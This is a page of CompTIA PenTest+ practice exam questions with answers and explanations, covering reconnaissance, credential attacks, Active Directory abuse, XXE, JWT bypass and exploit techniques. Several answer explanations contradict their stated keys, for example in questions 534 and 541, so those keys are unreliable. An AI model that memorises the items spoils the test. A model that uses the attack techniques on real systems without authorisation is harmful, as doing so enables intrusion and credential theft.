CompTIA PenTest+ PT0-002 (PT0-002) — Questions 526600

993 questions total · 14pages · All types, answers revealed

Page 7

Page 8 of 14

Page 9
526
MCQeasy

A penetration tester is conducting a vulnerability scan on a web server using Nikto. The scan report lists several findings, including a directory listing vulnerability and outdated server headers. Which type of scanner is Nikto?

A.Network port scanner
B.WordPress vulnerability scanner
C.Web server vulnerability scanner
D.General vulnerability scanner
AnswerC

Nikto specifically scans web servers for vulnerabilities.

Why this answer

Nikto is a web server scanner that tests for misconfigurations, outdated software, and common vulnerabilities. Nessus is a general vulnerability scanner, WPScan is for WordPress, and OpenVAS is also a general vulnerability scanner.

527
MCQhard

A penetration tester is reviewing SSL/TLS certificate information for a target domain and wants to discover additional subdomains that share the same certificate. Which resource is best for this purpose?

A.crt.sh
B.Shodan
C.Google Dorks
D.Wayback Machine
AnswerA

crt.sh is a certificate transparency search engine that can reveal subdomains via SSL certificates.

Why this answer

Certificate Transparency logs (e.g., crt.sh) allow searching by domain or certificate fingerprint to find all certificates issued for that domain, often revealing subdomains.

528
MCQeasy

Which Metasploit command is used to interact with an established session on a compromised host?

A.use
B.sessions
C.exploit
D.run
AnswerB

'sessions' allows interaction with existing sessions.

Why this answer

The sessions command lists and interacts with active sessions.

529
MCQmedium

A tester needs to brute-force SSH credentials on a target. Which tool is most appropriate for this task?

A.Aircrack-ng
B.Hashcat
C.Hydra
D.John the Ripper
AnswerC

Correct: supports SSH, FTP, HTTP form brute-force online.

Why this answer

Hydra is a versatile online brute-force tool supporting many protocols including SSH.

530
MCQhard

A penetration tester is performing a security assessment of a network that uses SNMP. The tester successfully connects to a device using the community string 'public'. Which tool would the tester MOST likely use to enumerate the entire Management Information Base (MIB) tree to extract system information, running processes, and network interfaces?

A.snmp-check
B.MIB Browser
C.snmpwalk
D.Nmap with snmp-brute script
AnswerC

Correct. snmpwalk is the standard tool for walking the MIB tree.

Why this answer

snmpwalk is the correct tool because it uses SNMP GETNEXT requests to systematically traverse the entire Management Information Base (MIB) tree, retrieving all OID values from a device. Given the tester already has a valid community string ('public'), snmpwalk can extract detailed system information, running processes, and network interfaces without needing to guess or brute-force credentials.

Exam trap

The trap here is that candidates confuse snmp-check with snmpwalk, assuming both perform the same MIB traversal, but snmp-check only queries a fixed set of OIDs while snmpwalk recursively retrieves the entire tree.

How to eliminate wrong answers

Option A is wrong because snmp-check is a passive information-gathering tool that queries specific SNMP OIDs for known vulnerabilities and misconfigurations, but it does not perform a full recursive walk of the entire MIB tree. Option B is wrong because a MIB Browser is a graphical tool for browsing MIB structures, but it is not the most likely command-line tool used in a penetration test for bulk enumeration; snmpwalk is the standard CLI utility for this task. Option D is wrong because Nmap with snmp-brute script is used to brute-force SNMP community strings, not to enumerate the MIB tree after a valid community string is already obtained.

531
MCQmedium

A client review of a penetration test report reveals confusion about why a particular vulnerability exists. The client's security engineer wants to understand the root cause and the exact steps to reproduce the issue. Which section of the report should the tester point the engineer to?

A.Executive Summary
B.Technical Findings
C.Methodology
D.Risk Rating Appendix
AnswerB

This section includes in-depth vulnerability descriptions, root cause analysis, reproduction steps, and remediation guidance.

Why this answer

The Technical Findings section provides the detailed, step-by-step reproduction steps and root cause analysis that the security engineer needs. This section includes specific commands, payloads, and configurations that led to the vulnerability, enabling the engineer to understand and verify the issue. The Executive Summary and Methodology sections do not contain this level of technical detail.

Exam trap

The trap here is that candidates confuse the purpose of the Methodology section (which describes the testing process) with the Technical Findings section (which contains the actual vulnerability details and reproduction steps).

How to eliminate wrong answers

Option A is wrong because the Executive Summary is a high-level overview intended for non-technical stakeholders, summarizing business risks and key findings without providing reproduction steps or root cause details. Option C is wrong because the Methodology section describes the overall testing approach, tools, and scope, but does not include the specific vulnerability reproduction steps or root cause analysis.

532
MCQeasy

Refer to the exhibit. A penetration tester has performed a basic Nmap scan and found an open MySQL service. Which of the following should the tester do NEXT to further investigate the MySQL service?

A.Perform a UDP scan on port 3306
B.Connect to the MySQL service using default credentials
C.Run a version detection scan using -sV on port 3306
D.Scan for other hosts with port 3306 open
AnswerC

Version detection reveals the MySQL version, aiding vulnerability assessment.

Why this answer

Option C is correct because the next logical step after discovering an open MySQL service (port 3306) is to perform version detection using `-sV` in Nmap. This identifies the exact MySQL version, which is critical for determining known vulnerabilities (CVEs) and appropriate exploitation techniques. Without version information, the tester cannot assess whether the service is outdated or misconfigured.

Exam trap

The trap here is that candidates may think default credential testing (Option B) is the immediate next step, but the PT0-002 exam emphasizes systematic information gathering—version detection must precede exploitation attempts to avoid unnecessary noise or failed attacks.

How to eliminate wrong answers

Option A is wrong because MySQL runs over TCP, not UDP; port 3306 is a TCP port, and a UDP scan would be irrelevant and waste time. Option B is wrong because attempting default credentials without first identifying the MySQL version or understanding the authentication mechanism is premature and could alert the target or lock out accounts. Option D is wrong because scanning for other hosts with port 3306 open is a broad reconnaissance step that should occur after understanding the current target's service details, not before.

533
MCQeasy

A penetration tester is writing the executive summary of a penetration test report. Which of the following elements is MOST important to include for a non-technical audience?

A.Detailed list of all ports and services found
B.CVSS scores for every vulnerability
C.A high-level summary of the overall risk and key findings
D.Raw tool output from vulnerability scans
AnswerC

This provides the essential overview that executives need to understand the test's outcome and make informed decisions.

Why this answer

C is correct because the executive summary is intended for a non-technical audience, such as senior management or stakeholders, who need a concise overview of the organization's security posture. A high-level summary of the overall risk and key findings communicates the business impact and strategic priorities without overwhelming them with technical details. This aligns with the PT0-002 objective of tailoring communication to the audience, ensuring the report drives decision-making rather than technical analysis.

Exam trap

The trap here is that candidates often confuse the executive summary with the technical report, assuming that including raw data like port lists or CVSS scores demonstrates thoroughness, when in fact the exam tests the ability to tailor content to the audience's technical level.

How to eliminate wrong answers

Option A is wrong because a detailed list of all ports and services found is too granular for a non-technical audience; it belongs in the technical findings or appendices, where system administrators can act on it. Option B is wrong because CVSS scores for every vulnerability are numerical metrics that require context to interpret; non-technical readers may not understand the scoring methodology or its implications, and presenting all scores without prioritization can obscure the overall risk picture.

534
Multi-Selecteasy

A penetration tester is using Metasploit to exploit a remote Windows service. After a successful exploit, the tester gets a meterpreter session. Which TWO commands can the tester use to gather system information and credentials?

Select 2 answers
A.hashdump
B.shell
C.upload
D.getuid
E.sysinfo
AnswersA, D

Dumps password hashes from the SAM database.

Why this answer

getuid and hashdump are meterpreter commands for user info and credential dumping. sysinfo also works but getuid is more specific to user. The question asks for TWO, so getuid and hashdump are correct.

535
Multi-Selectmedium

A penetration tester is writing a Bash script to automate scanning of multiple subnets with Nmap and parse the output. Which three features are commonly used in such a script? (Choose THREE.)

Select 3 answers
A.PowerShell cmdlets
B.Nmap XML output (-oX)
C.For loop
D.grep
E.PySerial
AnswersB, C, D

XML output is machine-parseable for further processing.

Why this answer

B is correct because Nmap's XML output (-oX) provides structured, machine-parseable data that a Bash script can easily process with tools like grep, sed, or XML parsers (e.g., xmllint). This allows the penetration tester to extract specific fields (e.g., open ports, service versions) reliably across multiple subnets, avoiding the fragility of parsing human-readable text output.

Exam trap

The trap here is that candidates may confuse cross-platform scripting features (like PowerShell cmdlets) with Bash-native constructs, or mistakenly think PySerial is relevant for network scanning, when the exam focuses on Bash-specific tools (for loops, grep) and Nmap's structured output (-oX) for automation.

536
MCQmedium

During a penetration test, a penetration tester discovers a critical vulnerability that could allow an attacker to gain administrative access to the client's payment processing server. According to best practices, what should the tester do?

A.Exploit the vulnerability to demonstrate impact and document it
B.Wait until the end of the test to include it in the final report
C.Immediately notify the client point of contact
D.Ask the client for permission to continue testing
AnswerC

Immediate notification allows the client to mitigate the risk promptly.

Why this answer

Option C is correct because when a critical vulnerability that could compromise a payment processing server is discovered during a penetration test, the tester must immediately notify the client point of contact (POC) per responsible disclosure and incident response best practices. This allows the client to take urgent mitigating actions, such as applying patches or isolating the server, before the vulnerability is exploited by malicious actors. Delaying notification violates ethical guidelines and could lead to severe financial and reputational damage.

Exam trap

The trap here is that candidates may think exploiting the vulnerability to demonstrate impact (Option A) is necessary for a convincing report, but the PT0-002 exam emphasizes that immediate notification of critical findings takes precedence over demonstration to prevent real-world harm.

How to eliminate wrong answers

Option A is wrong because exploiting the vulnerability without prior authorization, even for demonstration, could cause unintended service disruption or data corruption on a live payment processing server, violating the rules of engagement and potentially the Computer Fraud and Abuse Act (CFAA). Option B is wrong because waiting until the end of the test to report a critical vulnerability leaves the client exposed to exploitation during the testing period, which contradicts the principle of responsible disclosure and could result in a breach. Option D is wrong because asking for permission to continue testing after discovering a critical vulnerability is redundant; the tester already has permission to test, and the immediate priority is to alert the client to the risk, not to seek further authorization.

537
MCQmedium

A tester wants to perform an evil twin attack to capture WPA handshakes. Which tool from the Aircrack-ng suite is used to deauthenticate clients from a legitimate AP to force reconnection to the rogue AP?

A.airmon-ng
B.airodump-ng
C.aircrack-ng
D.aireplay-ng
AnswerD

Correct: injects deauth packets to disconnect clients.

Why this answer

aireplay-ng can send deauthentication packets to disconnect clients, facilitating handshake capture.

538
MCQmedium

A penetration tester is using Nmap to perform host discovery on a target network 192.168.1.0/24. The tester wants to identify live hosts without scanning ports. Which Nmap command should be used?

A.nmap -A 192.168.1.0/24
B.nmap -sS 192.168.1.0/24
C.nmap -sV 192.168.1.0/24
D.nmap -sn 192.168.1.0/24
AnswerD

Ping sweep discovers live hosts without port scanning.

Why this answer

Option D is correct because the `-sn` flag in Nmap performs a ping sweep (host discovery) without scanning any ports. It sends ICMP echo requests, TCP SYN to port 443, TCP ACK to port 80, and ICMP timestamp requests by default to determine which hosts are alive on the 192.168.1.0/24 network, making it the ideal choice for identifying live hosts without port scanning.

Exam trap

The trap here is that candidates often confuse `-sn` with `-sS` or `-A`, mistakenly thinking that a stealth scan or aggressive scan is needed for host discovery, when in fact `-sn` is the dedicated, port-free host discovery option.

How to eliminate wrong answers

Option A is wrong because `-A` enables aggressive scanning, which includes OS detection, version detection, script scanning, and traceroute — all of which involve port scanning and are not limited to host discovery. Option B is wrong because `-sS` performs a TCP SYN stealth scan, which scans ports on each host to determine their state, not just host discovery. Option C is wrong because `-sV` performs version detection on open ports, which requires an initial port scan and thus does not meet the requirement of identifying live hosts without scanning ports.

539
MCQmedium

A tester wants to perform a Kerberoasting attack against an Active Directory environment. Which Impacket tool would be most appropriate?

A.wmiexec
B.psexec
C.secretsdump
D.GetUserSPNs
AnswerD

GetUserSPNs is designed for Kerberoasting.

Why this answer

GetUserSPNs is the correct Impacket tool for Kerberoasting because it queries Active Directory for Service Principal Names (SPNs) associated with user accounts, then requests TGS tickets for those services. These tickets can be cracked offline to recover the service account's password hash, enabling privilege escalation.

Exam trap

Cisco often tests the distinction between tools that extract hashes (secretsdump) versus tools that request Kerberos tickets (GetUserSPNs), leading candidates to confuse hash dumping with Kerberoasting.

How to eliminate wrong answers

Option A is wrong because wmiexec is used for remote command execution via Windows Management Instrumentation (WMI), not for extracting Kerberos tickets. Option B is wrong because psexec executes commands remotely using SMB and service creation, not for Kerberoasting. Option C is wrong because secretsdump extracts password hashes from the SAM, NTDS.dit, and LSA secrets, but does not perform Kerberos TGS ticket requests or SPN enumeration.

540
Multi-Selectmedium

A penetration tester is exploiting a web application and discovers an endpoint that allows an attacker to read arbitrary files on the server by manipulating XML input. The application uses an XML parser that does not disable external entities. Which TWO attacks can the tester perform using this vulnerability? (Choose TWO.)

Select 2 answers
A.SSRF via XXE
B.File read via XXE
C.Command injection
D.SQL injection
E.XSS
AnswersA, B

XXE can be used to make server-side requests to internal resources (SSRF).

Why this answer

XXE (XML External Entity) allows file reads and can also lead to SSRF if the entity points to an internal URL. Command injection typically requires different input. SQL injection needs SQL syntax.

XSS is client-side.

541
Multi-Selectmedium

Which THREE of the following are best practices when communicating findings to stakeholders during a penetration test?

Select 3 answers
A.Share raw exploit code and logs without sanitization
B.Provide regular status updates to the client point of contact
C.Always include full technical details in every communication
D.Notify the client immediately upon discovering a critical vulnerability
E.Adjust the level of technical detail based on the audience
AnswersB, D, E

Keeps client informed.

Why this answer

Options A, B, and D are correct. Regular status updates (A) keep stakeholders informed. Immediate notification of critical findings (B) allows timely action.

Tailoring communication to audience (D) ensures understanding. Option C is wrong because technical details may be omitted for non-technical audience. Option E is wrong because evidence should be sanitized, not raw.

542
MCQeasy

A penetration tester is conducting passive reconnaissance on a target organization. The tester wants to identify all publicly accessible cloud storage buckets that might belong to the target without directly interacting with the target's infrastructure. Which of the following techniques would be most effective for this purpose?

A.Perform DNS enumeration using tools like `dnsrecon` to discover subdomains pointing to cloud storage services
B.Search for exposed cloud storage buckets using search engine dorks (e.g., 'site:s3.amazonaws.com target-company')
C.Query certificate transparency logs to find SSL certificates issued to the target's cloud storage endpoints
D.Perform a WHOIS lookup to find IP ranges owned by the target and then scan those ranges for open storage services
AnswerB

Search engine dorks are a passive technique that relies on cached indexes of cloud storage buckets that are misconfigured and publicly accessible, without sending any traffic to the target.

Why this answer

Option B is correct because search engine dorks allow a penetration tester to query publicly indexed content on cloud storage platforms like AWS S3 without sending any traffic to the target's infrastructure. By using a dork such as 'site:s3.amazonaws.com target-company', the tester leverages the search engine's pre-cached index to identify buckets that may be misconfigured or publicly accessible, which aligns perfectly with passive reconnaissance requirements.

Exam trap

The trap here is that candidates may confuse passive reconnaissance with techniques that appear passive but actually generate direct network queries (like DNS enumeration), or they may overlook that certificate transparency logs reveal domains, not storage buckets, leading them to choose a technically passive but functionally irrelevant option.

How to eliminate wrong answers

Option A is wrong because DNS enumeration with tools like `dnsrecon` involves actively querying DNS servers, which generates network traffic to the target's authoritative name servers or resolvers, making it an active reconnaissance technique rather than passive. Option C is wrong because querying certificate transparency logs (e.g., via crt.sh) is a passive technique, but it reveals SSL certificates and domain names, not cloud storage buckets; it does not directly identify publicly accessible storage endpoints like S3 buckets.

543
Multi-Selectmedium

A penetration tester is conducting a web application test and finds a parameter that is vulnerable to XXE. Which THREE of the following actions can the tester perform using XXE?

Select 3 answers
A.Execute SQL injection
B.Cause a denial of service
C.Read sensitive files from the server
D.Perform SSRF to internal services
E.Bypass authentication
AnswersB, C, D

XXE can be used for billion laughs attack or other DoS.

Why this answer

XXE can read files, perform SSRF, and cause denial of service. SQL injection is not typically a direct result of XXE.

544
MCQmedium

A penetration tester is prioritizing remediation recommendations in a report. Which of the following should be considered first?

A.Vulnerabilities that require significant code changes first.
B.Vulnerabilities with the lowest CVSS scores to clear many issues quickly.
C.Critical and high severity vulnerabilities, especially those that are easy to fix.
D.All vulnerabilities in the order they were discovered.
AnswerC

This addresses the highest risk and provides quick wins.

Why this answer

Critical and high severity vulnerabilities that pose immediate risk should be prioritized first, along with quick wins that can be implemented rapidly.

545
MCQmedium

A penetration tester is analyzing a Bash script that performs network scanning. The script contains the following command: 'for ip in $(seq 1 254); do hping3 -S -p 22 -c 1 $TARGET_SUBNET.$ip 2>/dev/null | grep -q "flags=SA" && echo "$TARGET_SUBNET.$ip: open"; done'. What is the primary purpose of this script?

A.Conduct a TCP SYN scan to identify hosts with port 22 open
B.Perform a vulnerability assessment against SSH services
C.Execute an ICMP ping sweep to discover live hosts
D.Complete a full TCP three-way handshake and log successful connections
AnswerA

The script sends SYN packets to port 22 and looks for SYN-ACK responses, which is the definition of a TCP SYN scan.

Why this answer

The script uses hping3 with the -S flag (SYN) and -p 22 (port 22) to send TCP SYN packets to each IP in the target subnet. The grep -q 'flags=SA' checks for a SYN-ACK response, which indicates the port is open and listening. This is the classic behavior of a TCP SYN scan (half-open scan) to identify hosts with port 22 open.

Exam trap

The trap here is that candidates may confuse a TCP SYN scan on a specific port with a general ICMP ping sweep, or assume that scanning port 22 automatically implies an SSH vulnerability assessment, when in fact the script only performs port discovery, not vulnerability testing.

How to eliminate wrong answers

Option B is wrong because the script does not perform any vulnerability assessment; it only checks if port 22 is open (SYN-ACK received) and does not attempt to exploit or enumerate SSH service versions or vulnerabilities. Option C is wrong because the script uses TCP SYN packets to port 22, not ICMP echo requests (ping), so it is not an ICMP ping sweep; it specifically targets a single TCP port to identify live hosts with that port open.

546
MCQmedium

A penetration testing firm is scoping a test for a financial institution. The client insists that the test only be performed on systems located in the corporate headquarters, excluding cloud-based infrastructure and remote branch offices. Which of the following should the penetration tester emphasize during the scoping discussion?

A.The test will include social engineering of remote employees
B.The exclusion of cloud infrastructure may leave critical assets untested
C.The test can only be performed during off-hours
D.The tester will require VPN access to the corporate network
AnswerB

Correct. Emphasizing the risk of untested critical assets helps the client understand the scope limitation's impact on overall security assurance.

Why this answer

Option B is correct because the client's exclusion of cloud-based infrastructure and remote branch offices creates a significant gap in the test scope. A penetration test that ignores cloud assets (e.g., AWS, Azure, or SaaS applications) may miss critical vulnerabilities in systems that process or store sensitive financial data, as these are often part of the institution's attack surface. The tester must emphasize that such exclusions can lead to a false sense of security, as attackers frequently target cloud and remote assets due to their accessibility and potential misconfigurations.

Exam trap

The trap here is that candidates may focus on operational details like timing or social engineering, rather than recognizing that scope exclusions (especially cloud) directly undermine the test's ability to assess the full attack surface, which is a core principle of scoping in PT0-002.

How to eliminate wrong answers

Option A is wrong because social engineering of remote employees is a separate attack vector that does not address the core scoping issue of excluding cloud and branch office systems; the client's restriction is on the systems tested, not the methods used. Option C is wrong because the timing of the test (off-hours vs. business hours) is a separate operational consideration, not a direct response to the client's exclusion of cloud and branch infrastructure; the primary scoping concern is the incomplete coverage of the attack surface, not the schedule.

547
MCQeasy

During a web application test, a penetration tester needs to intercept and modify HTTP requests before forwarding them to the server. Which tool is best suited for this task?

A.Hydra
B.Nmap
C.Wireshark
D.Burp Suite
AnswerD

Burp Suite's proxy is designed for intercepting and modifying requests.

Why this answer

Burp Suite's proxy allows intercepting and modifying HTTP/S requests, making it the standard tool for web application testing.

548
MCQeasy

A penetration tester wants to crack NTLM hashes obtained from a Windows system. Which Hashcat mode should be used?

A.-m 1000
B.-m 22000
C.-m 0
D.-m 13100
AnswerA

Mode 1000 corresponds to NTLM.

Why this answer

Hashcat mode 1000 is for NTLM hashes.

549
MCQhard

During a penetration test, a tester uses Metasploit to exploit a Windows service and gets a meterpreter session. The tester wants to dump hashes from the compromised system. Which meterpreter command should be used?

A.hashdump
B.shell
C.sysinfo
D.getsystem
AnswerA

hashdump extracts password hashes from the SAM.

Why this answer

The hashdump command in meterpreter dumps the SAM database hashes.

550
MCQmedium

A penetration tester has compromised a Windows workstation and obtained a low-privileged domain user account. The tester discovers that this user belongs to a group that has the 'GenericWrite' privilege over a computer object in Active Directory. Which attack is most directly enabled by this misconfiguration?

A.Kerberoasting
B.Shadow Credentials
C.AS-REP Roasting
D.DCSync Attack
AnswerB

With GenericWrite over a computer object, the tester can write to the msDS-KeyCredentialLink attribute to add a rogue key credential, enabling a Shadow Credentials attack to request a TGT for the computer account.

Why this answer

The 'GenericWrite' privilege over a computer object allows the attacker to write to the msDS-KeyCredentialLink attribute of that object. By adding a rogue key credential, the attacker can trigger the Key Distribution Center (KDC) to accept a certificate-based authentication, enabling the Shadow Credentials attack to obtain a TGT for the computer account and escalate privileges.

Exam trap

The trap here is that candidates confuse the GenericWrite privilege with the ability to perform Kerberoasting or AS-REP Roasting, but those attacks require different preconditions (SPN or no pre-authentication) and do not directly exploit write access to computer object attributes.

How to eliminate wrong answers

Option A is wrong because Kerberoasting requires the attacker to have a valid TGT for a domain user and targets service accounts with SPNs, not computer objects with GenericWrite. Option C is wrong because AS-REP Roasting targets user accounts that do not require Kerberos pre-authentication, not computer objects, and does not leverage GenericWrite over an object.

551
MCQeasy

During the information gathering phase, a penetration tester wants to discover subdomains of a target domain using DNS queries and potentially brute-forcing common subdomain names. Which of the following tools is specifically designed for subdomain enumeration and can perform both passive and active techniques?

A.Nmap
B.dirsearch
C.Gobuster
D.Amass
AnswerD

Amass is a subdomain enumeration tool that integrates passive sources and active techniques.

Why this answer

Amass is a tool that performs subdomain enumeration using passive sources and active brute-forcing. Gobuster and dirsearch are for directory/file enumeration. Nmap is for port scanning.

552
MCQeasy

A penetration tester is writing the findings section of a report. The tester identified a critical SQL injection vulnerability that allows extraction of the entire customer database. The client's technical team has already remediated the issue. How should the tester present this finding to ensure clarity and usefulness?

A.Include the vulnerability with the risk rating, a brief description, and a note that it was remediated during the test
B.Exclude the vulnerability from the report because it has already been fixed
C.Document the vulnerability in full, including reproduction steps, impact, and evidence, and note the remediation status
D.Reduce the risk rating of the vulnerability because it has been fixed, and include it in an appendix
AnswerC

This approach ensures the report is complete and useful for the client's records, compliance, and future prevention. The remediation status provides closure.

Why this answer

Option C is correct because penetration testing standards (e.g., PTES, OWASP) require full documentation of all findings regardless of remediation status. Including reproduction steps, impact analysis, and evidence ensures the report serves as a permanent record for compliance, audit, and future reference. Noting the remediation status provides clear context that the issue has been resolved, which is critical for stakeholders who need to verify the fix.

Exam trap

The trap here is that candidates mistakenly think remediated vulnerabilities should be omitted or minimized, but the PT0-002 exam expects full documentation to maintain report integrity and support post-remediation validation.

How to eliminate wrong answers

Option A is wrong because it omits essential technical details such as reproduction steps and evidence, which are necessary for validating the remediation and for legal/regulatory compliance. Option B is wrong because excluding a remediated vulnerability violates reporting best practices and can lead to incomplete audit trails, making it impossible to prove the issue was ever addressed.

553
MCQmedium

During a penetration test, the tester discovers a JWT token that uses the 'alg:none' header. Which attack does this vulnerability enable?

A.Key confusion attack
B.Signature bypass using alg:none
C.Algorithm substitution attack
D.Timing attack
AnswerB

alg:none means no signature is required.

Why this answer

JWT with 'alg:none' allows an attacker to forge tokens without any signature, bypassing verification.

554
MCQhard

After completing a penetration test, the lead tester is preparing the executive summary. The client's CISO wants to understand the business impact of a critical vulnerability found in the customer-facing web application. Which of the following is the BEST way to convey this in the report?

A.List the CVSS score and exploitability metrics
B.Describe the attack scenario and potential financial loss
C.Provide the raw log entries showing the exploitation
D.Recommend a specific patch version
AnswerB

Correct. This explains the real-world consequences in business terms, which is most relevant for an executive summary.

Why this answer

Option B is correct because the executive summary must communicate business risk, not technical details. Describing the attack scenario and potential financial loss directly addresses the CISO's need to understand the business impact, such as revenue loss from a data breach or regulatory fines. This aligns with the PT0-002 objective of tailoring reports to the audience, where executives require risk context rather than exploit mechanics.

Exam trap

The trap here is that candidates confuse technical severity (CVSS) with business impact, assuming a high CVSS score inherently conveys business risk, but the CISO explicitly needs the financial and operational consequences, not just the score.

How to eliminate wrong answers

Option A is wrong because listing the CVSS score and exploitability metrics provides a technical severity rating but does not translate that into business impact (e.g., dollar amounts or reputational harm), which the CISO specifically requested. Option C is wrong because providing raw log entries showing exploitation is operational evidence for technical teams, not a summary for executive decision-making; it fails to convey the broader business consequences.

555
MCQmedium

A penetration tester is analyzing a Python script that uses the requests library to automate web vulnerability scanning. The script sends POST requests with payloads but receives 403 Forbidden responses for many requests, even though manual testing with the same payloads works. Which is the most likely cause?

A.Missing User-Agent header
B.Incorrect Content-Type header
C.Script is sending too many requests too fast
D.Payloads are URL-encoded incorrectly
AnswerA

Many WAFs block requests that lack a common browser User-Agent, flagging them as automated. Adding a realistic User-Agent often resolves 403 errors.

Why this answer

Option A is correct because many web servers and WAFs (Web Application Firewalls) block requests that lack a User-Agent header or use a default one like 'python-requests/2.x.x'. Manual testing typically uses a browser, which sends a legitimate User-Agent, while the script's default header triggers the 403 Forbidden response. Setting a realistic User-Agent header in the script mimics browser behavior and bypasses this common filter.

Exam trap

CompTIA often tests the misconception that 403 errors are always due to rate limiting or authentication issues, but here the trap is that the script's default User-Agent header is the root cause, not request frequency or content type.

How to eliminate wrong answers

Option B is incorrect because an incorrect Content-Type header would typically cause a 400 Bad Request or 415 Unsupported Media Type, not a 403 Forbidden, and the payloads work manually, so the Content-Type is likely correct. Option C is incorrect because rate limiting usually results in 429 Too Many Requests or connection timeouts, not a consistent 403 Forbidden on every request; the issue is with the request's identity, not its frequency.

556
MCQeasy

A penetration tester is performing passive reconnaissance to discover email addresses associated with a target domain. The tester wants to avoid sending any packets directly to the target's infrastructure. Which tool is most appropriate for this task?

A.Using the whois command to query domain registration details
B.Using Shodan to identify email servers and associated addresses
C.Using Google dorking with advanced search queries to find email addresses in indexed pages
D.Using theHarvester to search public sources like search engines, PGP key servers, and social media
AnswerD

TheHarvester is a passive reconnaissance tool that aggregates email addresses, subdomains, and other information from multiple public sources without sending traffic to the target, making it ideal for this scenario.

Why this answer

TheHarvester is designed specifically for passive reconnaissance, gathering email addresses, subdomains, and other data from public sources such as search engines, PGP key servers, and social media without sending any packets directly to the target's infrastructure. This aligns perfectly with the requirement to avoid direct interaction with the target domain.

Exam trap

CompTIA often tests the distinction between passive and active reconnaissance, and the trap here is that candidates may confuse 'passive' with 'using public sources' and incorrectly choose Google dorking (Option C) because it seems passive, but theHarvester is the dedicated tool that systematically aggregates email addresses from multiple public sources, making it the most appropriate for this specific task.

How to eliminate wrong answers

Option A is wrong because the whois command queries domain registration details from WHOIS servers, which are not part of the target's infrastructure but still involve sending DNS queries that could be logged or traced, and it does not directly discover email addresses associated with the domain. Option B is wrong because Shodan actively scans the internet for exposed devices and services, including email servers, which involves sending packets to the target's infrastructure and is not passive reconnaissance. Option C is wrong because Google dorking uses search engines to find indexed pages, which is passive, but it is less efficient and targeted for discovering email addresses compared to theHarvester, which automates the process across multiple public sources.

557
MCQhard

A penetration tester has discovered a web application that appears to be built with WordPress. The tester wants to identify installed plugins, themes, and potential vulnerabilities without triggering intrusion detection systems. Which tool is BEST suited for this task?

A.OpenVAS
B.Nikto
C.WPScan
D.Gobuster
AnswerC

Correct. It is purpose-built for WordPress security assessment.

Why this answer

WPScan is a dedicated WordPress vulnerability scanner that can enumerate plugins, themes, users, and known vulnerabilities. It can be configured to use passive methods or throttle requests to avoid detection.

558
MCQmedium

A penetration tester is writing the executive summary of a report. Which of the following is MOST important to include?

A.Overall risk rating and strategic recommendations
B.Step-by-step exploitation commands
C.Raw tool output and screenshots
D.Detailed CVSS scores for every vulnerability
AnswerA

The executive summary should present the big picture in business language.

Why this answer

The executive summary should provide a high-level overview in business language, including the overall risk rating, key findings, and strategic recommendations.

559
MCQeasy

A penetration tester wants to use Metasploit to exploit a remote service. After selecting an exploit module, which command is used to set the remote host IP address?

A.set LHOST
B.set RHOSTS
C.set TARGET
D.set LPORT
AnswerB

RHOSTS sets the remote host(s) for exploitation.

Why this answer

In Metasploit, 'set RHOSTS' is used to specify the target IP address.

560
MCQeasy

During a penetration test, a tester needs to perform a man-in-the-middle attack on a network that uses WPA2-Enterprise with PEAP. Which tool is most appropriate for capturing the authentication handshake to attempt offline cracking?

A.Wireshark
B.aircrack-ng
C.Ettercap
D.hostapd-wpe
AnswerD

hostapd-wpe sets up a rogue access point that captures EAP credentials for offline cracking.

Why this answer

hostapd-wpe (Wireless Pwnage Edition) is specifically designed to set up a rogue access point that impersonates a legitimate WPA2-Enterprise network. It captures the MSCHAPv2 challenge-response from the PEAP authentication handshake, which can then be used for offline dictionary or brute-force attacks against the user's credentials. Unlike other tools, hostapd-wpe handles the full EAP/PEAP exchange required for this attack.

Exam trap

The trap here is that candidates often confuse aircrack-ng's ability to capture WPA2-PSK handshakes with the different requirements of WPA2-Enterprise, where the attack targets the MSCHAPv2 credentials rather than the 4-way handshake.

How to eliminate wrong answers

Option A is wrong because Wireshark is a packet analyzer that can capture traffic but cannot perform a man-in-the-middle attack or initiate an authentication handshake; it lacks the ability to set up a rogue AP. Option B is wrong because aircrack-ng is used for cracking WPA/WPA2-PSK (pre-shared key) handshakes, not WPA2-Enterprise with PEAP, which uses EAP-MSCHAPv2 and requires a different attack vector. Option C is wrong because Ettercap is a network sniffing and MITM tool for LAN-based attacks (e.g., ARP spoofing), but it does not support 802.11 wireless rogue AP setup or EAP/PEAP handshake capture.

561
MCQeasy

A penetration testing firm is hired to assess a client's web application that integrates with a third-party payment processor's API. The client wants to include the payment processor's API in the test scope. Which action should the tester take FIRST?

A.Begin testing the API because it is part of the client's environment
B.Request written permission from the payment processor
C.Only test the client's internal systems, excluding the API
D.Use the payment processor's sandbox environment without notifying them
AnswerB

This is the correct first step. The tester must obtain explicit permission from the third party to ensure legal and ethical testing.

Why this answer

The correct first action is to request written permission from the payment processor because the API is owned and operated by a third party, not the client. Testing a third-party API without explicit authorization could violate the Computer Fraud and Abuse Act (CFAA) and the payment processor's terms of service, potentially leading to legal liability for both the tester and the client. The scope of a penetration test must be legally defined and agreed upon by all parties whose systems are being tested.

Exam trap

The trap here is that candidates assume the client's request automatically grants legal authority to test any integrated system, overlooking the critical distinction between ownership and integration in scoping agreements.

How to eliminate wrong answers

Option A is wrong because beginning to test the API without authorization assumes the client has the legal right to grant access to a third-party system, which is a common misconception that can lead to unauthorized access and legal consequences. Option C is wrong because it ignores the client's explicit request to include the API in the test scope, failing to meet the engagement requirements and potentially leaving critical integration vulnerabilities unassessed.

562
MCQhard

A penetration tester is exploiting a Linux system that has ASLR enabled but no stack canaries. The vulnerability is a classic stack-based buffer overflow. Which of the following is the most effective method to achieve code execution?

A.Prepend a NOP sled and inject shellcode into the buffer
B.Return-to-libc (ret2libc)
C.Return to the PLT entry for system()
D.Use a ROP chain to bypass ASLR and execute shellcode
AnswerC

The PLT (Procedure Linkage Table) address is not randomized by ASLR, allowing reliable calls to library functions.

Why this answer

Option C is correct because with ASLR enabled, direct shellcode injection fails due to randomized stack addresses, but the PLT entry for system() has a fixed, known address in the binary. Since there are no stack canaries, a simple buffer overflow can overwrite the return address to jump directly to system() in the PLT, passing a pointer to a command string (e.g., "/bin/sh") already in memory, achieving code execution without needing to know runtime addresses.

Exam trap

The trap here is that candidates assume ASLR always prevents code execution, but they overlook that PLT entries have fixed addresses in the binary, making ret2plt a viable bypass when no stack canaries are present.

How to eliminate wrong answers

